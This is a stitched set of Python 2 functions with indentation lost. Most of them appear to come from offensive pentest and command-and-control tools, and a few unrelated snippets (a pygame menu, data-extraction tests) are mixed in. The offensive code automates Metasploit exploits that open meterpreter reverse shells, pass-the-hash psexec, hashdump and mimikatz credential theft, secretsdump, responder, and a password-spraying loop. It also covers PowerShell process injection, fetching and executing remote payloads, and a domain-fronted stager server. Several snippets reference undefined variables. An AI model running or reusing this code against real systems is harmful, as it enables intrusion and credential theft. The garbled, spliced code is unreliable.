def processTarget(self, t, port):
if not self.seentarget(t + str(port)):
self.addseentarget(t + str(port))
self.display.verbose(self.shortName + " - Connecting to " + t)
try:
conn = httplib.HTTPConnection(t, port, timeout=10)
conn.request('OPTIONS', '/')
response = conn.getresponse()
text = ""
allowed = response.getheader('allow')
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(
port) + "_" + Utils.getRandStr(10)
if (allowed):
badoptions = ['PUT', 'DELETE', 'TRACE', 'TRACK']
for badopt in badoptions:
if (allowed.contains(badopt)):
self.fire("httpOption" + badopt)
self.addVuln(t, "httpOption" + badopt,
{"port": str(port), "output": outfile.replace("/", "%2F")})
self.display.error("VULN [httpOption%s] Found on [%s:%i]" % (badopt, host, int(port)))
text = "Allowed HTTP Options for %s : %s\n\nFull Headers:\n%s" % (
t, allowed, self.print_dict(response.getheaders()))
else:
text = "Allowed HTTP Options for %s : OPTIONS VERB NOT ALLOWED\n\nFull Headers:\n%s" % (
t, self.print_dict(response.getheaders()))
Utils.writeFile(text, outfile)
except httplib.BadStatusLine:
pass
# except socket.error as e:
except:
pass
def downloadAttachment(self, messageid=None):
if (not self.srv):
return
if messageid:
resp, data = self.srv.fetch(messageid,
"(RFC822)") # fetching the mail, "`(RFC822)`" means "get the whole stuff",
# but you can ask for headers only, etc
email_body = data[0][1] # getting the mail content
mail = email.message_from_string(email_body) # parsing the mail content to get a mail object
# Check if any attachments at all
if mail.get_content_maintype() != 'multipart':
return
# we use walk to create a generator so we can iterate on the parts and forget about the recursive headach
for part in mail.walk():
# multipart are just containers, so we skip them
if part.get_content_maintype() == 'multipart':
continue
# is this part an attachment ?
if part.get('Content-Disposition') is None:
continue
filename = part.get_filename()
if (not filename):
continue
file_path = os.path.join(self.config["outdir"], filename)
print "Downloading attachment [%s] to [%s]" % (messageid, file_path)
Utils.writeFile(part.get_payload(decode=True), file_path, "wb")
return
def searchDir(self, host, conn, share, path, depth=0):
if depth > 5:
return
try:
# list the files on each share (recursivity?)
names = conn.listPath(share, path, timeout=30)
for name in names:
if name.isDirectory:
if name.filename not in [u'.', u'..']:
self.searchDir(conn, host, share, path + name.filename + '/', depth + 1)
else:
for pattern in self.filepatterns:
try:
re.compile(pattern)
result = re.match(pattern, name.filename)
if (result):
#download the file
outfile = self.config["proofsDir"] + self.shortName + "_" + host + "_" + share + "_" + name.filename.replace("/", "-") + "_" + Utils.getRandStr(10)
temp_fh = StringIO()
conn.retrieveFile(share, path + name.filename, temp_fh)
temp_fh.seek(0)
Utils.writeFile(temp_fh.getvalue(), outfile)
self.display.debug("_____ Share[" + share + "] =" + path + name.filename)
except re.error:
pass
#self.display.debug("Invalid File Pattern --> %s <--" % pattern)
except:
self.display.debug('### can not access the resource')
return
def searchTarget(self, target, port, username, password):
success = False
# start packet capture
cap = self.pktCap(filter="tcp and port " + str(port) + " and host " + target, packetcount=10, timeout=10,
srcip="", dstip=target)
try:
if (Utils.port_open(target, 21)):
# attempt to connect to the remote host
with ftputil.FTPHost(target, username, password) as host:
success = True
# get list of files and loop over them
recursive = host.walk("/", topdown=True, onerror=None)
for root, dirs, files in recursive:
for name in files:
for pattern in self.filepatterns:
match_list = fnmatch.filter(files, pattern)
for fname in match_list:
fpath = host.path.join(root, fname)
if host.path.isfile(fpath):
host.download(fpath, self.config["proofsDir"] + ip + fpath.replace("/", "_"))
host.close()
except ftputil.error.PermanentError:
self.display.error("Could not connect to %s on port 21" % (target))
outfile = self.config["proofsDir"] + self.shortName + "_PCAP_Port" + str(
port) + "_" + target + "_" + Utils.getRandStr(10)
Utils.writeFile(self.getPktCap(cap), outfile)
kb.add("host/" + target + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
return success
def run(self, argv):
# load config
self.parse_parameters(argv)
self.load_config()
# validate that all necessary flags/configs were set
# if single username and password
if (self.config["username"] and self.config["password"]):
mp.pillage(username=self.config["username"], password=self.config["password"], server=self.config["server"], servertype=self.config["servertype"], domain=self.config["domain"])
# if seperate username and password files
elif (Utils.isReadable(self.config["usernamefile"]) and Utils.isReadable(self.config["passwordfile"])):
usernames = list()
passwords = list()
with open(self.config["usernamefile"]) as f:
usernames = f.read().splitlines()
with open(self.config["passwordfile"]) as f:
passwords = f.read().splitlines()
for u in usernames:
for p in passwords:
mp.pillage(username=u, password=p, server=self.config["server"], port=int(self.config["serverport"]), domain=self.config["domain"])
elif Utils.isReadable(self.config["usernamepasswordfile"]):
# if a combined username password file
usernames = list()
with open(self.config["usernamepasswordfile"]) as f:
usernamespasswords = f.read().splitlines()
for temp in usernamepasswords:
(u, p) = temp.split(":", 1)
mp.pillage(username=u, password=p, server=self.config["server"], port=int(self.config["serverport"]), domain=self.config["domain"])
def load_config(self):
# does config file exist?
if (self.config["config_filename"] is not None):
temp1 = self.config
temp2 = Utils.loadConfig(self.config["config_filename"])
self.config = dict(temp2.items() + temp1.items())
else:
# guess not.. so try to load the default one
if Utils.is_readable("default.cfg"):
self.display.error("a CONFIG FILE was not specified... defaulting to [default.cfg]")
print
temp1 = self.config
temp2 = Utils.loadConfig("default.cfg")
self.config = dict(temp2.items() + temp1.items())
else:
# someone must have removed it!
self.display.error("a CONFIG FILE was not specified...")
print
sys.exit(1)
# set verbosity/debug level
if (self.config['verbose'] >= 1):
self.display.enableVerbose()
if (self.config['verbose'] > 1):
self.display.enableDebug()
def view_event(self, data):
log_path = Utils.get_arg_at(data, 1, 2)
if log_path == "":
UI.error("Missing arguments")
return
log_path += ".log"
rows = Utils.get_arg_at(data, 2, 2)
if rows == "":
rows = 10
else:
try:
rows = int(rows)
except:
rows = 10
log_path = Log.get_current_path(log_path)
data = []
if Utils.file_exists(log_path):
for line in open(log_path, "rb").readlines():
data.append(line)
print "\nLast %d lines of log\n-----------------------\n" % rows
data = list(reversed(data))
for i in range(0, rows):
try:
print data[i]
except:
pass
def exec_code(self, data):
try:
cmd, path = data.split(" ", 1)
except:
UI.error("Missing arguments")
return ""
data = ";"
path = self.alias.get_alias(path)
if Utils.file_exists(path, False, False):
data = Utils.load_file_unsafe(path)
else:
data = Utils.download_url(path)
if not data == ";":
UI.success("Fetching %s" % path)
data = base64.b64encode(data)
ps = Utils.load_powershell_script("exec.ps1", 12)
ps = Utils.update_key(ps, "PAYLOAD", data)
UI.success("Payload should be executed shortly on the target")
return ps
else:
UI.error("Cannot fetch the resource")
return data
def downloadAttachment(self, messageid=None):
if (not self.srv):
return
if (not messageid):
return
(server_msg, body, octets) = self.srv.retr(messageid)
msg = email.message_from_string('\n'.join(body))
# save attach
for part in msg.walk():
if part.get_content_maintype() == 'multipart':
continue
if part.get('Content-Disposition') is None:
continue
filename = part.get_filename()
if not (filename):
continue
file_path = os.path.join(self.config["outdir"], filename)
print "Downloading attachment [%s] to [%s]" % (messageid, file_path)
Utils.writeFile(part.get_payload(decode=True), file_path, "wb")
return None
def writeMessage(self, messageid, text):
filename = self.user + "_" + messageid
filename = "".join(c for c in filename if c.isalnum()).rstrip()
file_path = os.path.join(self.config["outdir"], filename)
print "Downloading message id [%s] to [%s]" % (messageid, file_path)
Utils.writeFile(text, file_path)
def process(self):
# load any targets we are interested in
self.getTargets()
for t in self.targets:
sessions = kb.get('host/' + t + '/msfSession')
if len(sessions) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
password=self.config['msfpass'])
if msf.isAuthenticated():
# loop over each target
for s in sessions:
# verify we have not tested this session before
if not self.seentarget(s):
# add the new IP to the already seen list
self.addseentarget(s)
msf.execute("sessions -i " + str(s) + "\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("getuid\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("background\n")
outfile = self.config[
"proofsDir"] + self.shortName + "_GetUid_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
for line in text.splitlines():
m = re.match(r'^\s*Server username: (.*)\s*', line)
if (m):
self.display.verbose("Metasploit Session [" + s +
"] running as user [" + m.group(1).strip() + "]")
msf.execute("sessions -i " + str(s) + "\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("sysinfo\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("background\n")
outfile = self.config[
"proofsDir"] + self.shortName + "_SysInfo_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
for line in text.splitlines():
m = re.match(r'^\s*OS\s\s*: (.*)\s*', line)
if (m):
self.display.verbose("Metasploit Session [" + s +
"] running on OS [" + m.group(1).strip() + "]")
# clean up after ourselves
result = msf.cleanup()
return
def processTarget(self, t, port):
if not self.seentarget(t + str(port)):
self.addseentarget(t + str(port))
self.display.verbose(self.shortName + " - Connecting to " + t)
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + str(port) + "_" + Utils.getRandStr(
10) + ".png"
url = "http://" + t + ":" + str(port)
Utils.webScreenCap(url, outfile)
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
self.display.verbose(self.shortName + " - Connecting to " + t)
msf.execute("use auxiliary/scanner/smb/smb_enumusers\n")
msf.execute("set RHOSTS %s\n" % t)
msf.execute("run\n")
# msf.sleep(int(self.config['msfexploitdelay']))
result = msf.getResult()
while (re.search(".*execution completed.*", result) is None):
result = result + msf.getResult()
# TODO - process results and store user list to KB
# need to do something better with this.
# loop over each user and store in the KB
# if local, store in "/host/" + t + "/user/" + user
# if domain, store in "/domain/" + domainname + "/user/" + user
# for now, just print out the results
# MSF output format:[*] [timestamp] IP DOMAIN [user,users] ( extras)
parts = re.findall(".*" + t.replace(".", "\.") + ".*", result)
for part in parts:
if "RHOSTS" in part:
pass
else:
try:
pieces = part.split()
domain = pieces[3]
kb.add("domain/" + domain.strip() + "/host/" + t)
extras = part.split('(')[1].split(')')[0]
users = part.split('[')[3].split(']')[0].split(',')
for user in users:
kb.add("host/" + t + "/user/" + user.strip())
except:
pass
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
for t in self.targets:
sessions = kb.get('shell/' + t + '/msf')
if len(sessions) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
password=self.config['msfpass'])
if msf.isAuthenticated():
# loop over each target
for s in sessions:
# verify we have not tested this session before
if not self.seentarget(s):
# add the new IP to the already seen list
self.addseentarget(s)
myMsf.lock.acquire()
msf.execute("sessions -i " + str(s) + "\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("hashdump\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("background\n")
msf.sleep(int(self.config['msfexploitdelay']))
# TODO - process results and store results in KB
# regex match on [^:]+:[^:]+:[^:]+:[^:]+:::
outfile = self.config[
"proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
myMsf.lock.release()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
msf.execute("sessions -i " + str(s) + "\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("load mimikatz\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("wdigest\n")
msf.sleep(int(self.config['msfexploitdelay']))
msf.execute("background\n")
# TODO - process results and store results in KB
outfile = self.config[
"proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
# clean up after ourselves
result = msf.cleanup()
return
def powerless(self, data):
try:
cmd, ps_cmd = data.split(" ", 1)
except:
UI.error("Missing arguments")
return ""
ps = Utils.load_powershell_script("powerless.ps1", 22)
ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(ps_cmd))
return ps
def run(self, target="127.0.0.1", ports="1-1024", flags="-sS", vector="", filetag=""):
# get tmp file
proofsDir = ""
if "proofsDir" in self.config.keys():
proofsDir = self.config["proofsDir"]
self.outfile = proofsDir + "NMAP-" + filetag + "-" + Utils.getRandStr(10)
command = "nmap " + flags + " -p " + ports + " -oA " + self.outfile + " " + target
tmp_results = Utils.execWait(command)
self.display.output("Scan file saved to [%s]" % self.outfile)
return self.loadXMLFile(self.outfile + ".xml", "nmapFile")
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# If any results are succesful, this will become true and Fire will be called in the end
callFire = False
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
myMsf.lock.acquire()
self.display.verbose(self.shortName + " - Connecting to " + t)
msf.execute("use exploit/multi/misc/java_rmi_server\n")
msf.execute("set RHOST %s\n" % t)
#msf.execute("set TARGET 0\n")
msf.execute("set TARGET 2\n")
msf.execute("set PAYLOAD linux/x86/meterpreter/reverse_tcp")
msf.execute("set LPORT 4445\n")
msf.execute("exploit -j\n")
msf.sleep(int(self.config['msfexploitdelay']))
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
result = msf.getResult()
myMsf.lock.release()
Utils.writeFile(result, outfile)
parts = re.findall(".*Meterpreter session.*", result)
for part in parts:
callFire = True
self.addVuln(t, "JavaRMI", {"port": "1099", "output": outfile.replace("/", "%2F")})
if callFire:
self.fire("msfSession")
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
self.display.verbose(self.shortName + " - Connecting to " + t)
# get windows domain/workgroup
temp_file2 = self.config[
"proofsDir"] + "nmblookup_" + t + "_" + Utils.getRandStr(
10)
command2 = "nmblookup -A " + t
result2 = Utils.execWait(command2, temp_file2)
workgroup = "WORKGROUP"
for line in result2.split('\n'):
m = re.match(r'\s+(.*)\s+<00> - <GROUP>.*', line)
if (m):
workgroup = m.group(1).strip()
self.display.debug(
"found ip [%s] is on the workgroup/domain [%s]" %
(t, workgroup))
# make outfile
outfile = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
10)
# run rpcclient
command = "smbclient -N -W " + workgroup + " -L " + t
result = Utils.execWait(command, outfile)
# check to see if it worked
if "Anonymous login successful" in result:
# fire a new trigger
self.fire("nullSession")
self.addVuln(t, "nullSession", {
"type": "smb",
"output": outfile.replace("/", "%2F")
})
self.display.error("VULN [NULLSession] Found on [%s]" % t)
# TODO - process smbclient results
# parse out put and store any new info and fire any additional triggers
else:
# do nothing
self.display.verbose("Could not get NULL Session on %s" %
t)
return
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'],
port=int(self.config['msfport']),
user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# If any results are succesful, this will become true and Fire will be called in the end
callFire = False
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
self.display.verbose(self.shortName + " - Connecting to " +
t)
msf.execute("use exploit/multi/misc/java_rmi_server\n")
msf.execute("set RHOSTS %s\n" % t)
msf.execute("set TARGET 0\n")
msf.execute("set PAYLOAD java/meterpreter/reverse_tcp\n")
msf.execute("run\n")
msf.sleep(5)
outfile = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(
10)
result = msf.getResult()
Utils.writeFile(result, outfile)
parts = re.findall(".*Meterpreter session.*", result)
for part in parts:
callFire = True
self.addVuln(t, "JavaRMI", {
"port": "1099",
"output": outfile.replace("/", "%2F")
})
if callFire:
self.fire("msfSession")
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
for t in self.targets:
sessions = kb.get('host/' + t + '/msfSession')
if len(sessions) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'],
port=self.config['msfport'],
user=self.config['msfuser'],
password=self.config['msfpass'])
if msf.isAuthenticated():
# loop over each target
for s in sessions:
# verify we have not tested this session before
if not self.seentarget(s):
# add the new IP to the already seen list
self.addseentarget(s)
msf.execute("sessions -i " + str(s) + "\n")
msf.execute("hashdump\n")
msf.execute("background\n")
# TODO - process results and store results in KB
outfile = self.config[
"proofsDir"] + self.shortName + "_HashDump_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName +
"/" + outfile.replace("/", "%2F"))
msf.execute("sessions -i " + str(s) + "\n")
msf.execute("load mimikatz\n")
msf.execute("wdigest\n")
msf.execute("background\n")
# TODO - process results and store results in KB
outfile = self.config[
"proofsDir"] + self.shortName + "_Mimikatz_" + t + "_" + Utils.getRandStr(
10)
text = msf.getResult()
Utils.writeFile(text, outfile)
kb.add("host/" + t + "/files/" + self.shortName +
"/" + outfile.replace("/", "%2F"))
# clean up after ourselves
result = msf.cleanup()
return
def add_tag(self, buffer, current_line):
self.tags_selection[current_line] = (self.tags_selection[current_line] + 1) % 2
if self.tags_selection[current_line] == 0:
self.utils.add_breakpoint(Utils.convert_to_one_index(current_line))
else:
self.utils.remove_breakpoint(Utils.convert_to_one_index(current_line))
if self.tags[current_line] is None:
self.tags[current_line] = buffer.create_tag("tag_" + str(current_line), background="orange")
buffer.apply_tag(self.tags[current_line], buffer.get_iter_at_line(current_line),
buffer.get_iter_at_line(current_line + 1))
return
self.tags[current_line].props.background = self.colors[self.tags_selection[current_line]]
def test_kato_file_extract(self):
src_conf_path = os.path.join(WEB_SOURCES_CONFIG_DIR,
'web_statgov_kato.json')
json_raw = Utils.read_file(src_conf_path)
download_handler = HandlersFactory.get_handler(
Downloader.handler_name(json_raw))
service = Downloader(json_raw, download_handler)
file_path = service.download()
extract_handler = HandlersFactory.get_handler(
Extractor.handler_name(json_raw))
service = Extractor(json_raw, file_path, extract_handler)
file_paths = service.extract()
self.assertTrue(Utils.all_exists(file_paths))
def inject(self, data):
try:
option, pid, cmd = data.split(" ", 2)
except:
UI.error("Missing arguments")
return ""
ps = Utils.load_powershell_script("injector.ps1", 1)
ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(cmd))
ps = Utils.update_key(ps, "PID", pid)
UI.success("Injecting %s" % cmd)
UI.success("Into process with PID %s" % pid)
return ps
def list_clients(self, data):
print "\nList of active shells\n-----------------------\n"
for shell in self.db.get_all_shells():
guid = shell.split(":")[0]
timestamp = Utils.unix_to_date(self.db.get_data(shell))
prompt = self.db.get_data("%s:prompt" % guid)
id = self.db.get_data("%s:id" % guid)
if not id == "":
if Utils.get_arg_at(data, 1, 2) == "full":
print " %s\t%s %s last seen %s" % (id, prompt, guid, timestamp)
else:
print " %s\t%s" % (id, prompt)
def inject(self, data):
try:
option, pid, cmd = data.split(" ", 2)
except:
UI.error("Missing arguments")
return ""
ps = Utils.load_powershell_script("injector.ps1", 1)
ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(cmd))
ps = Utils.update_key(ps, "PID", pid)
UI.success("Injecting %s" % cmd)
UI.success("Into process with PID %s" % pid)
return ps
def list_clients(self, data):
print("\nList of active shells\n"+"-"*21+"\n")
for shell in self.db.get_all_shells():
guid = shell.split(":")[0]
timestamp = Utils.unix_to_date(self.db.get_data(shell))
prompt = self.db.get_data("%s:prompt" % guid)
id = self.db.get_data("%s:id" % guid)
if not id == "":
if Utils.get_arg_at(data, 1, 2) == "full":
print(" %s\t%s %s last seen %s" % (id, prompt, guid, timestamp))
else:
print(" %s\t%s" % (id, prompt))
def downloadMessage(self, messageid=None):
if (not self.srv):
return
if messageid:
(server_msg, body, octets) = self.srv.retr(messageid)
filename = self.user + "_" + str(messageid)
file_path = os.path.join(self.config["outdir"], filename)
print "Downloading message id [%s] to [%s]" % (messageid, file_path)
Utils.writeFile(email_body, file_path)
return None
def inject(self):
try:
(option, pid, cmd) = self.data.split(" ", 2)
except:
self.output += self.output_cli_or_str("Missing arguments")
return ""
ps = Utils.load_powershell_script(
"%s/injector.ps1" % THUNDERSHELL.POWERSHELL_SCRIPT, 1)
ps = Utils.update_key(ps, "PAYLOAD", base64.b64encode(cmd))
ps = Utils.update_key(ps, "PID", pid)
self.output += self.output_cli_or_str("Injecting %s" % cmd)
self.output += self.output_cli_or_str("Into process with PID %s" % pid)
return ps
def do_GET(self):
force_download = False
if self.path.split("/")[1] == "api":
server_api = ServerApi(self.config, self)
self.output = server_api.process()
self.return_json()
return
path = self.path.split("/")[-1]
payload_path = self.path.split("/")
filename = Utils.gen_str(12)
if payload_path[1] == self.config.get("http-download-path"):
force_download = True
extension = "ps1"
payload = Payload(self.config)
payload.set_callback("__default__")
profile = self.config.get("profile")
if profile.get("domain-fronting") == "on":
payload.set_fronting(profile.get("domain-fronting-host"))
if len(payload_path) > 3:
payload.set_type(payload_path[2])
extension = payload_path[2]
if extension == "exe-old": extension = "exe"
if len(payload_path) > 4:
payload.set_delay(payload_path[3])
payload.set_callback(payload_path[4])
filename = "%s.%s" % (Utils.gen_str(12), extension)
Log.log_event(
"Download Stager",
"Stager was fetched from %s (%s). Stager type is %s" %
(self.client_address[0], self.address_string(), extension))
self.output = payload.get_output()
elif path in Utils.get_download_folder_content():
force_download = True
self.output = Utils.load_file("download/%s" % path)
Log.log_event(
"Download File", "%s was downloaded from %s (%s)" %
(path, self.client_address[0], self.address_string()))
else:
self.output = Utils.load_file(
"html/%s" % self.config.get("http-default-404"))
Log.log_error("Invalid request got a GET request", self.path)
self.return_data(force_download, filename)
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=int(self.config['msfport']), user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# If any results are succesful, this will become true and Fire will be called in the end
callFire = False
# loop over each target
for t in self.targets:
# verify we have not tested this host before
if not self.seentarget(t):
# add the new IP to the already seen list
self.addseentarget(t)
myMsf.lock.acquire()
self.display.verbose(self.shortName + " - Connecting to " + t)
msf.execute("use auxiliary/scanner/snmp/snmp_login\n")
msf.execute("set RHOSTS %s\n" % t)
msf.execute("set VERSION 2c\n")
msf.execute("exploit\n")
msf.sleep(int(self.config['msfexploitdelay']))
result = msf.getResult()
while (re.search(".*execution completed.*", result) is None):
result = result + msf.getResult()
myMsf.lock.release()
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
Utils.writeFile(result, outfile)
parts = re.findall(".*LOGIN SUCCESSFUL.*", result)
for part in parts:
callFire = True
# Add all relevant details
p = part.split()
comString = p[p.index("SUCCESSFUL:") + 1]
self.addVuln(t, "snmpCred", {"port": "161", "message": str(part), "communityString": comString,
"output": outfile.replace("/", "%2F")})
if callFire:
self.fire("snmpCred")
# clean up after ourselves
result = msf.cleanup()
return
def output(self):
job_file = os.path.join(JOBS_CONFIG_DIR, str(self.jobfile))
job_conf = Utils.read_file(job_file)
base = os.path.basename(self.input().path)
day = dt.today().strftime("%Y%m%d")
ftp_path = os.path.join(
FTP_REMOTE_PATH, "{}_{}.{}".format(
os.path.splitext(base)[0], day, Utils.ext(self.input().path)))
if Box(json.loads(job_conf)).gzip:
ftp_path += '.gzip'
return RemoteTarget(ftp_path,
FTP_HOST,
username=FTP_USER,
password=FTP_PASS)
def test_companies_files_extract(self):
src_conf_path = os.path.join(WEB_SOURCES_CONFIG_DIR,
'web_statgov_companies.json')
json_raw = Utils.read_file(src_conf_path)
download_handler = HandlersFactory.get_handler(
Downloader.handler_name(json_raw))
service = Downloader(json_raw, download_handler)
downloaded_files_path = service.download()
extract_handler = HandlersFactory.get_handler(
Extractor.handler_name(json_raw))
service = Extractor(json_raw, downloaded_files_path, TEMP_PATH,
extract_handler)
all_files = service.extract()
self.assertTrue(Utils.all_exists(all_files))
def get_autocommands(self, guid):
profile = self.config.get('profile')
commands = profile.get('autocommands')
if isinstance(commands, list):
UI.success('Running auto commands on shell %s' % guid)
Log.log_event('Running auto commands on shell', guid)
for command in commands:
print '\t[+] %s' % command
Log.log_shell(guid, 'Sending', command)
self.db.append_shell_data(
guid, "[%s] AutoCommand Sending: \n%s\n" %
(Utils.timestamp(), command))
self.db.push_cmd(guid, command, Utils.guid(),
self.config.get('username'))
def __init__(self):
disp_no = os.getenv("DISPLAY")
if disp_no:
logger.debug("I'm running under X display = {0}".format(disp_no))
# Check which frame buffer drivers are available
# Start with fbcon since directfb hangs with composite output
drivers = ['fbcon', 'directfb', 'svgalib']
found = False
pygame.init()
pygame.display.init()
'''
for driver in drivers:
# Make sure that SDL_VIDEODRIVER is set
if not os.getenv('SDL_VIDEODRIVER'):
os.putenv('SDL_VIDEODRIVER', driver)
try:
pygame.display.init()
except pygame.error:
logger.debug('Driver: {0} failed.'.format(driver))
continue
found = True
break
'''
pygame.font.init()
pygame.mouse.set_visible(0) #hide mouse
self.screen = pygame.display.set_mode((WIDTH, HEIGHT))
#self.screen = pygame.display.set_mode((WIDTH, HEIGHT), pygame.FULLSCREEN)
pygame.display.set_caption('Menu')
self.clock = pygame.time.Clock()
self.running = True
self.loadAssets()
logger.debug("launch joystics init...")
utils = Utils()
utils.initJoysticks()
#disable mouse
pygame.event.set_blocked(pygame.MOUSEMOTION)
#movements and keys init
self.downPushed = False
self.upPushed = False
self.leftPushed = False
self.rightPushed = False
self.joyUp = False
self.joyDown = False
self.joyLeft = False
self.joyRight = False
self.zPressed = False
self.tPressed = False
self.screensaver = False
def process(self):
temp_file = self.config["proofsDir"] + self.shortName + "_" + Utils.getRandStr(10)
command = "responder -I eth0 -wrf"
# run for 15 minutes
# result = Utils.execWait(command, temp_file, timeout=900)
result = Utils.execWait(command, temp_file, timeout=60)
# TODO
# check to see if we got any creds
# if not, wait 5 minutes and run again for 15 minutes
# repeat upto 5 4 times
return
def __init__(self, data, req):
self.data = data
self.utils = Utils()
self.netutils = Network()
self.metadata = {
'unique_id' : self.utils.generate_uuid(),
'timestamp' : self.utils.get_datetime(),
'node': gethostname(),
'issuer':{
'user_agent':req.headers.get('User-Agent'),
'source_ip':req.remote_addr
}
}
self.data['metadata'] = self.metadata
def process(self):
# load any targets we are interested in
self.getTargets()
if len(self.targets) > 0:
# connect to msfrpc
msf = myMsf(host=self.config['msfhost'], port=self.config['msfport'], user=self.config['msfuser'],
password=self.config['msfpass'])
if not msf.isAuthenticated():
return
# loop over each target
for t in self.targets:
users = kb.get("host/" + t + "/user")
for user in users:
hashes = kb.get ("host/" + t + "/user/" + user + "/fullhash")
for passhash in hashes:
# verify we have not tested this host before
if not self.seentarget(t+user+passhash):
# add the new IP to the already seen list
self.addseentarget(t+user+passhash)
self.display.verbose(self.shortName + " - Connecting to " + t)
msf.execute("use exploit/windows/smb/psexec\n")
# msf.execute("set PAYLOAD windows/meterpreter/bind_tcp\n")
# msf.execute("set LHOST %s\n" % self.config['lhost'])
# msf.execute("set LPORT %i\n" % int(Utils.getUnusedPort()))
# msf.execute("set LPORT 4444\n")
msf.execute("set RPORT 445\n")
msf.execute("set RHOST " + t + "\n")
msf.execute("set SMBUser " + user + "\n")
msf.execute("set SMBPass " + passhash + "\n")
msf.execute("exploit -j\n")
msf.sleep(int(self.config['msfexploitdelay']))
outfile = self.config["proofsDir"] + self.shortName + "_" + t + "_" + Utils.getRandStr(10)
result = msf.getResult()
Utils.writeFile(result, outfile)
kb.add("host/" + t + "/files/" + self.shortName + "/" + outfile.replace("/", "%2F"))
parts = re.findall(".*Meterpreter session (\d+) opened.*", result)
for part in parts:
self.fire("msfSession")
self.display.verbose("NEW session on : " + t)
kb.add("host/" + t + "/msfSession/" + str(part))
# clean up after ourselves
result = msf.cleanup()
return
def process(self):
# load any targets we are interested in
self.getTargets()
# loop over each target
for t in self.targets:
users = kb.get(['host/' + t + '/user'])
self.display.verbose(self.shortName + " - Connecting to " + t)
for user in users:
# verify we have not tested this host before
if not self.seentarget(t + str(user)):
# add the new IP to the already seen list
self.addseentarget(t + str(user))
passwords = kb.get(
['host/' + t + '/user/' + user + '/password'])
for password in passwords:
self.display.verbose(self.shortName +
" - Connecting to " + t)
# make outfile
temp_file = self.config[
"proofsDir"] + self.shortName + "_" + t + "_" + user + "_" + Utils.getRandStr(
10)
# run secretesdump.py
command = self.config["secretsdump.py"] + " -outputfile " + temp_file + " \"" + user + "\":\"" + password + \
"\"@" + t
result = Utils.execWait(command, None)
if Utils.isReadable(temp_file + '.sam'):
with open(temp_file + '.sam', "r") as myfile:
result = myfile.readlines()
for line in result:
m = line.split(':')
user = m[0].strip()
uid = m[1].strip()
lmhash = m[2].strip()
ntlmhash = m[3].strip()
kb.add("host/" + t + "/user/" + user +
"/lmhash/" + lmhash)
kb.add("host/" + t + "/user/" + user +
"/ntlmhash/" + ntlmhash)
kb.add("host/" + t + "/user/" + user +
